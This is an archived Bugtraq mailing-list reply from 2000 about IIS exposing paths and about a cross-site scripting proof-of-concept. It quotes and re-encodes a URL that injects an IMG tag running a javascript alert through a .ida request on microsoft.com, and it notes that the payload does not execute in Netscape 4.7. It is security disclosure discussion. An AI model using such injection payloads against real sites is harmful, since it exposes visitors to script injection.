[13350] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: IIS still revealing paths for web directories

daemon@ATHENA.MIT.EDU (Scott Buchanan)
Fri Jan 14 22:12:57 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <387E5C0F.AB74508E@axe.net.au>
Date:         Fri, 14 Jan 2000 10:13:19 +1100
Reply-To: Scott Buchanan <scott@AXE.NET.AU>
From: Scott Buchanan <scott@AXE.NET.AU>
X-To:         Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@SECURITYFOCUS.COM

Georgi Guninski wrote:
>
> For Communicator:
> http://www.microsoft.com/%3CIMG%20SRC=javascript:alert("window.location:"+window.location)%3E.ida

This link comes out as:

http://www.microsoft.com/%3CIMG%20SRC=javascript:alert(

presumably because the quotes need to be % encoded as well.

http://www.microsoft.com/%3CIMG%20SRC=javascript:alert(%34window.location:%34%43window.location)%3E.ida

This link, while it seems to work in as far as you can go to the
correct link, the Javascript doesn't get executed on this copy of
Netscape 4.7

-Scott Buchanan
Axe Communications


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[13350] in bugtraq

Re: IIS still revealing paths for web directories

daemon@ATHENA.MIT.EDU (Scott Buchanan)Fri Jan 14 22:12:57 2000

daemon@ATHENA.MIT.EDU (Scott Buchanan)
Fri Jan 14 22:12:57 2000